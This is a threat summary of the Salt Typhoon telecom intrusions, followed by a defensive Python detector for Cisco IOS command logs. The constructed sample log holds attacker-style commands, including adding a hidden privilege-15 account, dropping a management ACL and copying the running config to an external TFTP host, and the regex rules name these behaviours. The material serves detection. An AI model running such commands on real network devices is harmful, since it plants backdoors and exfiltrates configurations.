The Chinese state-sponsored hacking group Salt Typhoon (aka Earth Estries, GhostEmperor, UNC2286) infiltrated major U.S. telecom providers, including Verizon, AT&T, Lumen Technologies, and T-Mobile. Using stolen credentials and custom malware named JumbledPath, the group monitored network traffic and stole sensitive data, including government communications and wiretapping requests.
🔍 Key Details:
Access Method: Stolen credentials; only one known exploitation (Cisco CVE-2018-0171).
Persistence: Extracted credentials, intercepted SNMP, TACACS, and RADIUS traffic, and used TFTP/FTP for exfiltration.
JumbledPath: Go-based ELF binary targeting Linux devices, enabling stealthy packet capture, disabling logs, and erasing traces.
Network Manipulation: Modified configs, enabled Guest Shell, altered ACLs, and created hidden accounts.
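The "Persistence" and "Network Manipulation" details above translate directly into things a defender can look for in device command logs: local accounts being added, Guest Shell being enabled, ACL changes, and configs being copied off the box over TFTP/FTP. The script below is an added example (not from the report summarised above and not Cisco's or any vendor's tooling); it parses syslog lines in the shape of Cisco IOS `archive`/`log config` CFGLOG_LOGGEDCMD messages and flags those behaviours. The log lines, hostnames, usernames and IP addresses are constructed for the example, and the message layout is an approximation of the real format, so adjust `CMD_RE` to what your collectors actually receive.

```python
import re

# Constructed sample syslog (not real device output). Layout approximates the
# Cisco IOS "archive / log config / logging enable" command-logging message.
SAMPLE_LOG = """\
<189>Feb 20 10:01:02 edge-rtr1 %PARSER-5-CFGLOG_LOGGEDCMD: User:netops logged command:interface GigabitEthernet0/1
<189>Feb 20 10:02:15 edge-rtr1 %PARSER-5-CFGLOG_LOGGEDCMD: User:svc_backup logged command:username sysadm1n privilege 15 secret 5 $1$placeholder
<189>Feb 20 10:02:40 edge-rtr1 %PARSER-5-CFGLOG_LOGGEDCMD: User:svc_backup logged command:guestshell enable
<189>Feb 20 10:03:05 edge-rtr1 %PARSER-5-CFGLOG_LOGGEDCMD: User:svc_backup logged command:no ip access-list extended MGMT-IN
<189>Feb 20 10:04:11 edge-rtr1 %SYS-5-CONFIG_I: Configured from console by svc_backup on vty1 (203.0.113.7)
<189>Feb 20 10:05:30 edge-rtr1 %PARSER-5-CFGLOG_LOGGEDCMD: User:svc_backup logged command:copy running-config tftp://203.0.113.7/rtr1.cfg
"""

# One logged configuration command per line (assumed layout, see lead-in).
CMD_RE = re.compile(
    r"^(?:<\d+>)?(?P<ts>\w{3} +\d+ [\d:]+) (?P<host>\S+) "
    r"%PARSER-5-CFGLOG_LOGGEDCMD: User:(?P<user>\S+) logged command:(?P<cmd>.*)$"
)

# Behaviours named in the summary, expressed as patterns over the command text.
RULES = {
    "guestshell_enabled": re.compile(r"^guestshell\s+enable\b"),
    "local_account_added": re.compile(r"^username\s+\S+\s+.*\b(?:privilege\s+15|secret|password)\b"),
    "acl_changed": re.compile(r"^(?:no\s+)?(?:ip\s+)?access-list\b"),
    "aaa_or_snmp_changed": re.compile(r"^(?:no\s+)?(?:aaa|tacacs|radius|snmp-server)\b"),
    "config_copied_tftp_ftp": re.compile(r"^copy\s+\S+\s+(?:tftp|ftp)://", re.IGNORECASE),
}


def parse_logged_commands(text):
    """Return one dict (ts, host, user, cmd) per CFGLOG_LOGGEDCMD line; other lines are ignored."""
    events = []
    for line in text.splitlines():
        m = CMD_RE.match(line.strip())
        if m:
            events.append(m.groupdict())
    return events


def find_suspicious(text):
    """Tag every logged command that matches one of RULES with the rule name."""
    hits = []
    for ev in parse_logged_commands(text):
        for name, rx in RULES.items():
            if rx.search(ev["cmd"]):
                hits.append({**ev, "rule": name})
    return hits


def users_with_multiple_behaviours(hits, threshold=2):
    """Accounts that triggered at least `threshold` distinct rules: one ACL edit is
    routine, but one account adding a user, enabling Guest Shell, dropping an ACL
    and pushing the config to an external TFTP server in minutes is not."""
    by_user = {}
    for h in hits:
        by_user.setdefault(h["user"], set()).add(h["rule"])
    return {u: sorted(r) for u, r in by_user.items() if len(r) >= threshold}


if __name__ == "__main__":
    hits = find_suspicious(SAMPLE_LOG)
    for h in hits:
        print(f"{h['ts']} {h['host']} user={h['user']} rule={h['rule']} cmd={h['cmd']}")
    print("escalate:", users_with_multiple_behaviours(hits))
```

In the constructed sample the `netops` interface change produces nothing, while `svc_backup` trips four rules and is the account that gets escalated; on real telemetry the same grouping by user and host, plus a short time window, is what separates a stolen service account from an engineer doing routine maintenance.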